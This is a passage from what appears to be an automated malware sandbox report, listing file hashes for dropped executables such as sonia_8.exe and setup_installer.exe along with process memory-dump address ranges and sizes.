                                                                                      fbdbda4c62fe23ea8ef14b3387a2b8ea9309328bd790c3e9f93bd0122d268d9c

                                                                                      SHA512

                                                                                      e77141328f013e9b47a75bea0b74613be37ab6e1ed91923b1698211d77c5111c72f8d6a894de0ac5cd7024d6e9197e50625c3afb4b32a739997f125a0da97ee3

                                                                                    • \Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_8.exe
                                                                                      MD5

                                                                                      5445bc02dfa09836955c97bba1285ce0

                                                                                      SHA1

                                                                                      77695425294a3da3b06c19c75e74ab52c5416d3a

                                                                                      SHA256

                                                                                      fbdbda4c62fe23ea8ef14b3387a2b8ea9309328bd790c3e9f93bd0122d268d9c

                                                                                      SHA512

                                                                                      e77141328f013e9b47a75bea0b74613be37ab6e1ed91923b1698211d77c5111c72f8d6a894de0ac5cd7024d6e9197e50625c3afb4b32a739997f125a0da97ee3

                                                                                    • \Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_8.exe
                                                                                      MD5

                                                                                      5445bc02dfa09836955c97bba1285ce0

                                                                                      SHA1

                                                                                      77695425294a3da3b06c19c75e74ab52c5416d3a

                                                                                      SHA256

                                                                                      fbdbda4c62fe23ea8ef14b3387a2b8ea9309328bd790c3e9f93bd0122d268d9c

                                                                                      SHA512

                                                                                      e77141328f013e9b47a75bea0b74613be37ab6e1ed91923b1698211d77c5111c72f8d6a894de0ac5cd7024d6e9197e50625c3afb4b32a739997f125a0da97ee3

                                                                                    • \Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_8.exe
                                                                                      MD5

                                                                                      5445bc02dfa09836955c97bba1285ce0

                                                                                      SHA1

                                                                                      77695425294a3da3b06c19c75e74ab52c5416d3a

                                                                                      SHA256

                                                                                      fbdbda4c62fe23ea8ef14b3387a2b8ea9309328bd790c3e9f93bd0122d268d9c

                                                                                      SHA512

                                                                                      e77141328f013e9b47a75bea0b74613be37ab6e1ed91923b1698211d77c5111c72f8d6a894de0ac5cd7024d6e9197e50625c3afb4b32a739997f125a0da97ee3

                                                                                    • \Users\Admin\AppData\Local\Temp\7zS466A1996\sonia_9.exe
                                                                                      MD5

                                                                                      f7bf73fb1b22bbf11fc321de0605e0c6

                                                                                      SHA1

                                                                                      0f24ed3ce18e5864ecbd1a51f8026a8e1b02f724

                                                                                      SHA256

                                                                                      425dbc147da1271991a894544f26661ea760e72b497fd84d855df5c6334dd8f5

                                                                                      SHA512

                                                                                      722e1534a3f1d3add9ae94b8e1891911deaed9f26474ad820007535f37cdf097473e67a465c6c60a7a7bea9e64d4006e2096dc2c0f960a548482d59a64803635

                                                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                      MD5

                                                                                      026da38a9c4c6d98fe5a4323d9d97c42

                                                                                      SHA1

                                                                                      3fcc5cfd86b832111693885616582d1926e03a6b

                                                                                      SHA256

                                                                                      0743f2ccfd94143ac06690b2d6e49ca786a91ce7b2b666ac56ee5e36613fb155

                                                                                      SHA512

                                                                                      d3509c6cfef0ddea58ba373b7f913b9f41475bb52668f3cd204be2d21016f3e8d9bac752f4f0de0445b8347e51d2fb239b75b596c61efde3e0c67cfda724959d

                                                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                      MD5

                                                                                      026da38a9c4c6d98fe5a4323d9d97c42

                                                                                      SHA1

                                                                                      3fcc5cfd86b832111693885616582d1926e03a6b

                                                                                      SHA256

                                                                                      0743f2ccfd94143ac06690b2d6e49ca786a91ce7b2b666ac56ee5e36613fb155

                                                                                      SHA512

                                                                                      d3509c6cfef0ddea58ba373b7f913b9f41475bb52668f3cd204be2d21016f3e8d9bac752f4f0de0445b8347e51d2fb239b75b596c61efde3e0c67cfda724959d

                                                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                      MD5

                                                                                      026da38a9c4c6d98fe5a4323d9d97c42

                                                                                      SHA1

                                                                                      3fcc5cfd86b832111693885616582d1926e03a6b

                                                                                      SHA256

                                                                                      0743f2ccfd94143ac06690b2d6e49ca786a91ce7b2b666ac56ee5e36613fb155

                                                                                      SHA512

                                                                                      d3509c6cfef0ddea58ba373b7f913b9f41475bb52668f3cd204be2d21016f3e8d9bac752f4f0de0445b8347e51d2fb239b75b596c61efde3e0c67cfda724959d

                                                                                    • \Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                      MD5

                                                                                      026da38a9c4c6d98fe5a4323d9d97c42

                                                                                      SHA1

                                                                                      3fcc5cfd86b832111693885616582d1926e03a6b

                                                                                      SHA256

                                                                                      0743f2ccfd94143ac06690b2d6e49ca786a91ce7b2b666ac56ee5e36613fb155

                                                                                      SHA512

                                                                                      d3509c6cfef0ddea58ba373b7f913b9f41475bb52668f3cd204be2d21016f3e8d9bac752f4f0de0445b8347e51d2fb239b75b596c61efde3e0c67cfda724959d

                                                                                    • memory/524-232-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                      Filesize

                                                                                      436KB

                                                                                    • memory/524-155-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                      Filesize

                                                                                      436KB

                                                                                    • memory/1180-162-0x0000000000970000-0x00000000009A2000-memory.dmp
                                                                                      Filesize

                                                                                      200KB

                                                                                    • memory/1180-175-0x000007FEF56B0000-0x000007FEF609C000-memory.dmp
                                                                                      Filesize

                                                                                      9.9MB

                                                                                    • memory/1180-171-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                      Filesize

                                                                                      24KB

                                                                                    • memory/1180-165-0x00000000003D0000-0x00000000003D6000-memory.dmp
                                                                                      Filesize

                                                                                      24KB

                                                                                    • memory/1180-168-0x00000000003E0000-0x0000000000404000-memory.dmp
                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/1564-54-0x0000000075D01000-0x0000000075D03000-memory.dmp
                                                                                      Filesize

                                                                                      8KB

                                                                                    • memory/1636-254-0x0000000002C80000-0x0000000002D9D000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/1644-89-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/1644-91-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/1644-82-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                      Filesize

                                                                                      572KB

                                                                                    • memory/1644-83-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                      Filesize

                                                                                      572KB

                                                                                    • memory/1644-94-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/1644-93-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/1644-92-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/1644-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/1644-90-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/1644-88-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                      Filesize

                                                                                      152KB

                                                                                    • memory/1644-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/1644-81-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                      Filesize

                                                                                      572KB

                                                                                    • memory/1644-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/1644-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/1656-268-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                      Filesize

                                                                                      120KB

                                                                                    • memory/1684-260-0x0000000000A10000-0x0000000000A4A000-memory.dmp
                                                                                      Filesize

                                                                                      232KB

                                                                                    • memory/1684-164-0x0000000000BA0000-0x0000000000C3C000-memory.dmp
                                                                                      Filesize

                                                                                      624KB

                                                                                    • memory/1684-269-0x0000000073570000-0x0000000073C5E000-memory.dmp
                                                                                      Filesize

                                                                                      6.9MB

                                                                                    • memory/1904-161-0x0000000000400000-0x0000000002BF0000-memory.dmp
                                                                                      Filesize

                                                                                      39.9MB

                                                                                    • memory/1904-160-0x0000000000240000-0x0000000000249000-memory.dmp
                                                                                      Filesize

                                                                                      36KB

                                                                                    • memory/1904-150-0x0000000002D50000-0x0000000002D59000-memory.dmp
                                                                                      Filesize

                                                                                      36KB

                                                                                    • memory/1904-159-0x0000000002D50000-0x0000000002D59000-memory.dmp
                                                                                      Filesize

                                                                                      36KB

                                                                                    • memory/1960-173-0x00000000031A0000-0x00000000031BE000-memory.dmp
                                                                                      Filesize

                                                                                      120KB

                                                                                    • memory/1960-169-0x0000000002D50000-0x0000000002D70000-memory.dmp
                                                                                      Filesize

                                                                                      128KB

                                                                                    • memory/1960-142-0x0000000002DB0000-0x0000000002DD1000-memory.dmp
                                                                                      Filesize

                                                                                      132KB

                                                                                    • memory/1976-166-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                      Filesize

                                                                                      24KB

                                                                                    • memory/1976-163-0x0000000000130000-0x0000000000160000-memory.dmp
                                                                                      Filesize

                                                                                      192KB

                                                                                    • memory/1976-167-0x00000000004C0000-0x00000000004E4000-memory.dmp
                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/1976-172-0x0000000000410000-0x0000000000416000-memory.dmp
                                                                                      Filesize

                                                                                      24KB

                                                                                    • memory/1976-174-0x000007FEF56B0000-0x000007FEF609C000-memory.dmp
                                                                                      Filesize

                                                                                      9.9MB

                                                                                    • memory/2016-147-0x0000000002E40000-0x0000000002EA4000-memory.dmp
                                                                                      Filesize

                                                                                      400KB

                                                                                    • memory/2496-256-0x00000000026C0000-0x00000000026D2000-memory.dmp
                                                                                      Filesize

                                                                                      72KB

                                                                                    • memory/2496-255-0x0000000002370000-0x000000000237C000-memory.dmp
                                                                                      Filesize

                                                                                      48KB

                                                                                    • memory/2496-191-0x0000000000800000-0x0000000000C3E000-memory.dmp
                                                                                      Filesize

                                                                                      4.2MB

                                                                                    • memory/2496-253-0x0000000002340000-0x0000000002350000-memory.dmp
                                                                                      Filesize

                                                                                      64KB

                                                                                    • memory/2496-196-0x0000000000800000-0x0000000000C3E000-memory.dmp
                                                                                      Filesize

                                                                                      4.2MB

                                                                                    • memory/2496-252-0x00000000007F0000-0x0000000000800000-memory.dmp
                                                                                      Filesize

                                                                                      64KB

                                                                                    • memory/2496-246-0x0000000000630000-0x000000000064C000-memory.dmp
                                                                                      Filesize

                                                                                      112KB

                                                                                    • memory/2508-183-0x0000000000400000-0x00000000005D9000-memory.dmp
                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/2508-186-0x00000000005E0000-0x0000000000640000-memory.dmp
                                                                                      Filesize

                                                                                      384KB

                                                                                    • memory/2536-188-0x0000000000800000-0x0000000000860000-memory.dmp
                                                                                      Filesize

                                                                                      384KB

                                                                                    • memory/2536-184-0x0000000000400000-0x00000000005DC000-memory.dmp
                                                                                      Filesize

                                                                                      1.9MB

                                                                                    • memory/2560-185-0x0000000000400000-0x00000000005DC000-memory.dmp
                                                                                      Filesize

                                                                                      1.9MB

                                                                                    • memory/2560-189-0x00000000006B0000-0x0000000000710000-memory.dmp
                                                                                      Filesize

                                                                                      384KB

                                                                                    • memory/2596-205-0x0000000001ED0000-0x0000000001FEB000-memory.dmp
                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/2596-182-0x0000000000500000-0x0000000000592000-memory.dmp
                                                                                      Filesize

                                                                                      584KB

                                                                                    • memory/2596-202-0x0000000000500000-0x0000000000592000-memory.dmp
                                                                                      Filesize

                                                                                      584KB

                                                                                    • memory/2660-237-0x00000000008CF000-0x00000000008DD000-memory.dmp
                                                                                      Filesize

                                                                                      56KB

                                                                                    • memory/2660-239-0x0000000000400000-0x0000000000470000-memory.dmp
                                                                                      Filesize

                                                                                      448KB

                                                                                    • memory/2660-238-0x0000000000230000-0x000000000023D000-memory.dmp
                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/2660-197-0x00000000008CF000-0x00000000008DD000-memory.dmp
                                                                                      Filesize

                                                                                      56KB

                                                                                    • memory/2704-247-0x000007FEF4CC0000-0x000007FEF56AC000-memory.dmp
                                                                                      Filesize

                                                                                      9.9MB

                                                                                    • memory/2704-192-0x0000000000E20000-0x0000000000E46000-memory.dmp
                                                                                      Filesize

                                                                                      152KB

                                                                                    • memory/2800-199-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                      Filesize

                                                                                      1.2MB

                                                                                    • memory/2812-204-0x0000000074730000-0x000000007477A000-memory.dmp
                                                                                      Filesize

                                                                                      296KB

                                                                                    • memory/2892-203-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp
                                                                                      Filesize

                                                                                      8KB

                                                                                    • memory/2928-244-0x0000000000390000-0x0000000000396000-memory.dmp
                                                                                      Filesize

                                                                                      24KB

                                                                                    • memory/2928-243-0x0000000000150000-0x000000000018A000-memory.dmp
                                                                                      Filesize

                                                                                      232KB

                                                                                    • memory/2928-242-0x0000000000140000-0x0000000000146000-memory.dmp
                                                                                      Filesize

                                                                                      24KB

                                                                                    • memory/2928-240-0x0000000000CC0000-0x0000000000CFE000-memory.dmp
                                                                                      Filesize

                                                                                      248KB

                                                                                    • memory/2932-225-0x0000000000400000-0x000000000048C000-memory.dmp
                                                                                      Filesize

                                                                                      560KB

                                                                                    • memory/2932-223-0x0000000001D40000-0x0000000001D84000-memory.dmp
                                                                                      Filesize

                                                                                      272KB

                                                                                    • memory/2932-222-0x00000000002A0000-0x00000000002C7000-memory.dmp
                                                                                      Filesize

                                                                                      156KB

                                                                                    • memory/2956-259-0x0000000001300000-0x0000000001320000-memory.dmp
                                                                                      Filesize

                                                                                      128KB